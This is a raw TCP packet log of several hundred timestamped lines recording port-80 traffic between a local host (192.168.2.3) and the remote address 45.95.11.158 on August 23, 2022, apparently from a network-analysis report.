Aug 23, 2022 03:42:49.149343967 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.149343967 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.149394989 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.149419069 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.149460077 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.149461985 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.149487019 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.149517059 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.149534941 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.149540901 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.149559021 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.149583101 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.149585962 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.149625063 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.149636030 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.149673939 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.149676085 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.149713039 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.149792910 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.149846077 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.149849892 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.149893045 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.149943113 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.159899950 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.179863930 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.179896116 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.179920912 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.179945946 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.179970026 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.179964066 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.179994106 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180012941 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180017948 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180021048 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180035114 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180047035 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180062056 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180071115 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180083036 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180097103 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180109978 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180121899 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180135012 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180155039 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180166006 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180179119 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180191994 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180203915 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180214882 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180228949 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180248976 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180253029 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180270910 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180278063 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180285931 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180300951 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180315971 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180324078 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180340052 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180349112 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180361032 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180372953 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180385113 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180399895 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180409908 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180425882 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180435896 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180450916 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180465937 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180475950 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180501938 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180511951 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180526018 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180542946 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180551052 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180567980 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180577040 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180591106 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180603027 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180609941 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180628061 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180639982 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180654049 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180666924 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180689096 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180763960 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180813074 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180813074 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180846930 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180855989 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180876970 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180886030 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180908918 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180917025 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180938959 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180947065 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.180970907 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.180979013 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.181001902 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.181010008 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.181039095 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.181049109 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.181078911 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.181088924 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.181109905 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.181118011 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.181140900 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.181148052 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.181173086 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.181179047 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.181202888 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.181219101 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.181232929 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.181243896 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.181263924 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.181273937 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.181293011 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.181303978 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.181323051 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.181329012 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.181353092 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.181364059 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.181382895 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.181391954 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.181415081 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.181423903 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.181444883 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.181452990 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.181503057 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.181509018 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.181534052 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.181544065 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.181562901 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.181575060 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.181593895 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.181601048 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.181624889 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.181632042 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.181655884 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.181663036 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.181687117 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.181693077 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.181716919 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.181746006 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.181746960 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.181762934 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.181777954 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.181792974 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.181807041 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.181819916 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.181837082 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.181860924 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.181865931 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.181880951 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.181895971 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.181905985 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.181927919 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.181952000 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.181957960 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.181984901 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.181988001 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.182012081 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.182019949 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.182049036 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.182077885 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.182079077 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.182087898 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.182111025 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.182130098 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.182140112 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.182166100 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.182172060 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.182182074 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.182202101 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.182212114 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.182233095 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.182240963 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.182262897 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.182271957 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.182292938 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.182301998 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.182323933 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.182331085 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.182356119 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.182360888 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.182385921 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.182394028 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.182425022 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.183432102 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.183460951 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.183492899 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.183500051 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.183522940 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.183530092 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.183573008 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.183593035 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.183623075 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.183636904 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.183654070 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.183666945 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.183684111 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.183692932 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.183715105 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.183723927 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.183746099 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.183763027 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.183777094 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.183806896 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.183820963 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.183832884 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.183835983 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.183851957 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.183866978 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.183875084 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.183897018 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.183911085 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.183927059 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.183942080 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.183957100 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.183968067 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.183986902 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.184016943 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.184019089 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.184046984 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.184077024 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.184077024 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.184103966 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.184106112 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.184134007 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.184138060 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.184149027 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.184166908 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.184179068 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.184196949 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.184214115 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.184226990 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.184237003 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.184258938 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.184267998 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.184303045 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.184461117 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.184494019 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.184515953 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.184523106 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.184540033 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.184551954 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.184573889 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.184581041 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.184588909 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.184612036 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.184618950 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.184643030 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.184655905 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.184673071 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.184684992 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.184701920 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.184711933 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.184732914 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.184741974 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.184762955 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.184783936 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.184792995 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.184803963 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.184822083 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.184830904 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.184851885 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.184875965 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.184905052 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.184907913 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.184953928 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.184957981 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.184983015 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.184994936 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.185026884 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.185050964 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.185090065 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.185101986 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.185131073 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.185141087 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.185162067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.185167074 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.185190916 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.185201883 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.185229063 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.185242891 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.185280085 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.185292959 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.185323000 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.185331106 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.185360909 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.185391903 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.185421944 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.185430050 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.185452938 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.185488939 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.185506105 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.185508013 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.185535908 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.185545921 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.185586929 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.185589075 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.185616970 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.185630083 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.185656071 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.185684919 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.185714960 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.185745001 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.185746908 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.185755968 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.185784101 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.185795069 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.185825109 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.185842037 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.185853958 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.185863018 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.185884953 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.185889959 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.185934067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.185936928 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.185965061 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.185972929 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.185995102 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.186002970 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.186023951 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.186034918 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.186053991 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.186059952 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.186083078 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.186091900 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.186114073 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.186126947 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:49.186145067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:49.186151981 CEST	49774	80	192.168.2.3	45.95.11.158
